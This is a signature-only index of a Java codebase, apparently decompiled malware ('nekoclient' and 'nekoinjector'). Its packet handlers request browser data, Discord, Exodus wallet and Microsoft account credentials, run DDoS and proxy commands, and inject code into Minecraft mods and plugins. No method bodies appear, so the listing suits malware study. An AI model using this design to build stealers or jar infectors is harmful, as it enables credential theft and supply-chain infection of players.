getName (line 30) | @Override method getDirection (line 35) | @Override method getReason (line 40) | public final DisconnectReason getReason() { FILE: dev/neko/nekoclient/packet/impl/server/HelloPacket.java class HelloPacket (line 9) | public class HelloPacket implements Packet { method read (line 10) | @Override method write (line 14) | @Override method getName (line 18) | @Override method getDirection (line 23) | @Override FILE: dev/neko/nekoclient/packet/impl/server/KeepAlivePacket.java class KeepAlivePacket (line 9) | public class KeepAlivePacket implements Packet { method read (line 10) | @Override method write (line 14) | @Override method getDirection (line 18) | @Override method getName (line 23) | @Override FILE: dev/neko/nekoclient/packet/impl/server/ProxyPacket.java class ProxyPacket (line 11) | public class ProxyPacket extends NoncePacket { method ProxyPacket (line 15) | public ProxyPacket() { method ProxyPacket (line 18) | public ProxyPacket(int acceptorPort, InetSocketAddress address) { method read (line 23) | @Override method write (line 30) | @Override method getName (line 38) | @Override method getDirection (line 43) | @Override method getAcceptorPort (line 48) | public final int getAcceptorPort() { method getAddress (line 52) | public final InetSocketAddress getAddress() { FILE: dev/neko/nekoclient/packet/impl/server/RequestBrowserDataPacket.java class RequestBrowserDataPacket (line 6) | public class RequestBrowserDataPacket extends NoncePacket { method getDirection (line 7) | @Override method getName (line 12) | @Override FILE: dev/neko/nekoclient/packet/impl/server/RequestDiscordPacket.java class RequestDiscordPacket (line 6) | public class RequestDiscordPacket extends NoncePacket { method getDirection (line 7) | @Override method getName (line 12) | @Override FILE: dev/neko/nekoclient/packet/impl/server/RequestExodusPacket.java class RequestExodusPacket (line 6) | public class RequestExodusPacket extends NoncePacket { method getDirection (line 7) | @Override method getName (line 12) | @Override FILE: dev/neko/nekoclient/packet/impl/server/RequestMSAPacket.java class RequestMSAPacket (line 6) | public class RequestMSAPacket extends NoncePacket { method getDirection (line 7) | @Override method getName (line 12) | @Override FILE: dev/neko/nekoclient/packet/impl/server/UpdateModulePacket.java class UpdateModulePacket (line 9) | public class UpdateModulePacket implements Packet { method UpdateModulePacket (line 13) | public UpdateModulePacket(String moduleName, boolean enabled) { method UpdateModulePacket (line 18) | public UpdateModulePacket() { method read (line 21) | @Override method write (line 27) | @Override method getDirection (line 33) | @Override method getName (line 38) | @Override method getModuleName (line 43) | public final String getModuleName() { method isEnabled (line 47) | public final boolean isEnabled() { FILE: dev/neko/nekoclient/packet/listener/PacketListener.java type PacketListener (line 7) | public interface PacketListener { method call (line 8) | void call(T var1, Client var2, String var3) throws IOException; FILE: dev/neko/nekoclient/packet/listener/impl/CommandPacketListener.java class CommandPacketListener (line 10) | public class CommandPacketListener implements PacketListener { method call (line 17) | public void call(DDoSPacket packet, Client client, String id) throws I... FILE: dev/neko/nekoclient/packet/listener/impl/DisconnectPacketListener.java class DisconnectPacketListener (line 8) | public class DisconnectPacketListener implements PacketListener { method call (line 9) | public void call(HelloPacket packet, Client client, String id) throws ... FILE: dev/neko/nekoclient/packet/listener/impl/ProxyPacketListener.java class ProxyPacketListener (line 17) | public class ProxyPacketListener implements PacketListener { method call (line 18) | public void call(ProxyPacket packet, Client client, String id) throws ... FILE: dev/neko/nekoclient/packet/listener/impl/RequestBrowserDataPacketListener.java class RequestBrowserDataPacketListener (line 12) | public class RequestBrowserDataPacketListener implements PacketListener<... method call (line 13) | public void call(RequestBrowserDataPacket packet, Client client, Strin... FILE: dev/neko/nekoclient/packet/listener/impl/RequestDiscordPacketListener.java class RequestDiscordPacketListener (line 22) | public class RequestDiscordPacketListener implements PacketListener { method register (line 12) | public void register(T... objects) { method unregister (line 16) | public void unregister(T... objects) { method getBy (line 20) | public T getBy(Predicate predicate) { method getObjects (line 24) | public final List getObjects() { FILE: dev/neko/nekoclient/structure/ThrowingRunnable.java type ThrowingRunnable (line 3) | public interface ThrowingRunnable { method run (line 4) | void run() throws T; FILE: dev/neko/nekoclient/utils/DNSUtil.java class DNSUtil (line 14) | public class DNSUtil { method resolveMinecraft (line 17) | public static DNSUtil.DNSEntry resolveMinecraft(String domain) throws ... class DNSEntry (line 60) | public static class DNSEntry { method DNSEntry (line 66) | public DNSEntry(int priority, int weight, String host, int port) { method getPort (line 73) | public final int getPort() { method getHost (line 77) | public final String getHost() { method getPriority (line 81) | public final int getPriority() { method getWeight (line 85) | public final int getWeight() { FILE: dev/neko/nekoclient/utils/EncodingUtil.java class EncodingUtil (line 5) | public class EncodingUtil { method decodeFromByteFormat (line 6) | public static byte[] decodeFromByteFormat(String string) { method encodeToByteFormat (line 17) | public static String encodeToByteFormat(byte[] bytes) { method reverseBytes (line 27) | public static byte[] reverseBytes(byte[] bytes) { method restoreReversedBytes (line 46) | public static byte[] restoreReversedBytes(byte[] reversedBytes) { FILE: dev/neko/nekoclient/utils/FormUtil.java class FormUtil (line 8) | public class FormUtil { method encodeToForm (line 9) | public static String encodeToForm(Map map) { FILE: dev/neko/nekoclient/utils/GraphicUtil.java class GraphicUtil (line 8) | public class GraphicUtil { method drawCenteredText (line 9) | public static void drawCenteredText(Window window, String text) { method resizeImage (line 16) | public static BufferedImage resizeImage(BufferedImage originalImage, i... FILE: dev/neko/nekoclient/utils/HardwareIDUtil.java class HardwareIDUtil (line 15) | public class HardwareIDUtil { method generateHardwareID (line 16) | public static String generateHardwareID() throws NoSuchAlgorithmExcept... FILE: dev/neko/nekoclient/utils/HashUtil.java class HashUtil (line 7) | public class HashUtil { method generateMD5Hash (line 8) | public static String generateMD5Hash(byte[] bytes) throws NoSuchAlgori... FILE: dev/neko/nekoclient/utils/JsonUtil.java class JsonUtil (line 7) | public class JsonUtil { method is (line 8) | public static boolean is(JsonValue value, Predicate predica... method isNot (line 12) | public static boolean isNot(JsonValue value, Predicate pred... FILE: dev/neko/nekoclient/utils/ObjectUtil.java class ObjectUtil (line 5) | public class ObjectUtil { method unsafeCast (line 6) | public static A unsafeCast(B b) { method requireNonNullElse (line 10) | public static T requireNonNullElse(T value, T fallback) { method requireNonNullAndExceptionElse (line 14) | public static T requireNonNullAndExceptionElse(ObjectUtil.Catcher<... method requireNonExceptionElse (line 23) | public static T requireNonExceptionElse(ObjectUtil.Catcher valu... type Catcher (line 31) | public interface Catcher { method get (line 32) | T get() throws Throwable; FILE: dev/neko/nekoclient/utils/SystemUtil.java class SystemUtil (line 9) | public class SystemUtil { method getAvailableProcessors (line 12) | public static int getAvailableProcessors() { method getTotalPhysicalMemory (line 16) | public static long getTotalPhysicalMemory() { method getProcessorName (line 34) | public static String getProcessorName() { method envBytes (line 45) | public static byte[] envBytes(int offset, String... properties) { method envBytes (line 50) | public static byte[] envBytes(String... properties) { method envBytes (line 54) | public static byte[] envBytes(String env) { method env (line 59) | public static String env(String env) { method propertyBytes (line 63) | public static byte[] propertyBytes(String property) { method propertyBytes (line 68) | public static byte[] propertyBytes(int offset, String... properties) { method propertyBytes (line 73) | public static byte[] propertyBytes(String... properties) { method property (line 77) | public static String property(String property) { method property (line 81) | public static String property(String... property) { FILE: dev/neko/nekoinjector/Injector.java class Injector (line 15) | public class Injector { method loadInstallerNode (line 16) | public static MethodNode loadInstallerNode(InputStream clazz, String r... method findMainClass (line 38) | public static String findMainClass(Manifest manifest) { FILE: dev/neko/nekoinjector/Loader.java class Loader (line 5) | public class Loader { method load (line 6) | public void load() { FILE: dev/neko/nekoinjector/asm/Entry.java class Entry (line 13) | public class Entry { method Entry (line 19) | public Entry(JarEntry jarEntry, ClassNode classNode, byte[] bytes, boo... method getJarEntry (line 26) | public final JarEntry getJarEntry() { method getClassNode (line 30) | public final ClassNode getClassNode() { method isInject (line 34) | public final boolean isInject() { method setInject (line 38) | public void setInject(boolean inject) { method getBytes (line 42) | public final byte[] getBytes() { method isClass (line 46) | public final boolean isClass() { method isResource (line 50) | public final boolean isResource() { method isInjected (line 54) | public final boolean isInjected(String encodedRef) { method inject (line 69) | public final byte[] inject(MethodNode methodNode) { method isCertificate (line 88) | public final boolean isCertificate() { FILE: dev/neko/nekoinjector/asm/EntryList.java class EntryList (line 9) | public class EntryList extends ArrayList { method getBy (line 10) | public Entry getBy(Predicate predicate) { method getByPath (line 14) | public Entry getByPath(String path) { method classes (line 20) | public List classes() { FILE: dev/neko/nekoinjector/template/SimpleTemplate.java class SimpleTemplate (line 10) | public class SimpleTemplate implements Template { method SimpleTemplate (line 15) | public SimpleTemplate(String name, List suggest, List ... method shouldSuggest (line 21) | @Override method getName (line 26) | @Override method getSuggest (line 31) | public final List getSuggest() { method getInjections (line 35) | public final List getInjections() { method shouldInject (line 39) | @Override FILE: dev/neko/nekoinjector/template/Template.java type Template (line 6) | public interface Template { method shouldSuggest (line 7) | boolean shouldSuggest(EntryList var1); method shouldInject (line 9) | boolean shouldInject(Entry var1); method getName (line 11) | String getName(); FILE: dev/neko/nekoinjector/template/impl/BungeecordPluginTemplate.java class BungeecordPluginTemplate (line 8) | public class BungeecordPluginTemplate implements Template { method shouldSuggest (line 11) | @Override method shouldInject (line 16) | @Override method getName (line 21) | @Override FILE: dev/neko/nekoinjector/template/impl/FabricModTemplate.java class FabricModTemplate (line 7) | public class FabricModTemplate implements Template { method shouldSuggest (line 10) | @Override method shouldInject (line 15) | @Override method getName (line 20) | @Override FILE: dev/neko/nekoinjector/template/impl/ForgeModTemplate.java class ForgeModTemplate (line 8) | public class ForgeModTemplate implements Template { method shouldSuggest (line 11) | @Override method shouldInject (line 24) | @Override method getName (line 33) | @Override FILE: dev/neko/nekoinjector/template/impl/MinecraftClientTemplate.java class MinecraftClientTemplate (line 7) | public class MinecraftClientTemplate extends SimpleTemplate { method MinecraftClientTemplate (line 8) | public MinecraftClientTemplate() { FILE: dev/neko/nekoinjector/template/impl/SpigotPluginTemplate.java class SpigotPluginTemplate (line 8) | public class SpigotPluginTemplate implements Template { method shouldSuggest (line 11) | @Override method shouldInject (line 16) | @Override method getName (line 21) | @Override FILE: dev/neko/nekoinjector/utils/EncodingUtil.java class EncodingUtil (line 5) | public class EncodingUtil { method decodeFromByteFormat (line 6) | public static byte[] decodeFromByteFormat(String string) { method encodeToByteFormat (line 17) | public static String encodeToByteFormat(byte[] bytes) { method reverseBytes (line 27) | public static byte[] reverseBytes(byte[] bytes) { method restoreReversedBytes (line 46) | public static byte[] restoreReversedBytes(byte[] reversedBytes) { FILE: dev/neko/nekoinjector/utils/ListUtil.java class ListUtil (line 8) | public class ListUtil { method toList (line 9) | public static void toList(List list, Enumeration enumerat...